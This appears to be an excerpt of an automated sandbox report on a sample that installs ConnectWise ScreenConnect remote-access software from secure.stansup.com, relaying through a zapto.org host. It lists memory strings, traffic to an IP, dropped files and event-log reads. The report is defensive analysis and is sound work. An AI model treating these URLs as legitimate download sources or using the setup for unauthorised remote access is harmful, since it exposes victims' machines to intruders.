                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063339170.000002487B510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000007.00000003.2063339170.000002487B510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                  Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staP
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staPB
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staPx
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100268000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.C
                  Source: 3coxOaV92n.exe, 00000000.00000002.2298053850.0000000000E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicat
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#
                  Source: dfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnec
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2423013752.000000001B7DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.Window
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001171000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2423327001.000000001B849000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421666111.0000000001243000.00000004.00000020.00020000.00000000.sdmp, 76GEJ2UX.log.1.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicat
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application$
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2422866223.000000001B780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application%
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application1
                  Source: dfsvc.exe, 00000001.00000002.2923145386.000002A175AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application21mZ
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application34e089
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application899
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application9
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application?
                  Source: 76GEJ2UX.log.1.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or
                  Source: dfsvc.exe, 00000001.00000002.2923145386.000002A175AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationH
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationKy
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationP
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421960225.0000000002EBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationX
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationft
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationh
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationn
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationx
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dll
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dll#
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421960225.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, 76GEJ2UX.log.1.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllL
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe0
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exex
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsCl
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configL
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe8
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exeC
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileMa
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exX
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.confign
                  Source: dfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bn
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B52C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49791 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  barindex
                  Detected potential unwanted application
                  Source: 3coxOaV92n.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_053629D0 CreateProcessAsUserW,11_2_053629D0
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\user.config
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00ACA4950_2_00ACA495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E98A101_2_00007FF848E98A10
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA1BC81_2_00007FF848EA1BC8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EBCBBD1_2_00007FF848EBCBBD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EBEB481_2_00007FF848EBEB48
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EB3C0C1_2_00007FF848EB3C0C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E8AF4F1_2_00007FF848E8AF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E933A11_2_00007FF848E933A1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EC93711_2_00007FF848EC9371
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EB32FD1_2_00007FF848EB32FD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848ECA4C01_2_00007FF848ECA4C0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E9D5991_2_00007FF848E9D599
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EB25811_2_00007FF848EB2581
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E927481_2_00007FF848E92748
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA39081_2_00007FF848EA3908
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E8FA111_2_00007FF848E8FA11
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA3B681_2_00007FF848EA3B68
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA2F211_2_00007FF848EA2F21
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E860501_2_00007FF848E86050
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E812111_2_00007FF848E81211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EBB46D1_2_00007FF848EBB46D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848E8758A9_2_00007FF848E8758A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848E81AC09_2_00007FF848E81AC0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848E81B389_2_00007FF848E81B38
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_0536004011_2_05360040
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_0536004011_2_05360040
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848E570BA12_2_00007FF848E570BA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848E5173012_2_00007FF848E51730
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848E516FA12_2_00007FF848E516FA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848E510CF12_2_00007FF848E510CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848E510D712_2_00007FF848E510D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF84916550612_2_00007FF849165506
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF84916574412_2_00007FF849165744
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF84916595712_2_00007FF849165957
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF8491655DB12_2_00007FF8491655DB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF849165DEB12_2_00007FF849165DEB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848E770BA13_2_00007FF848E770BA
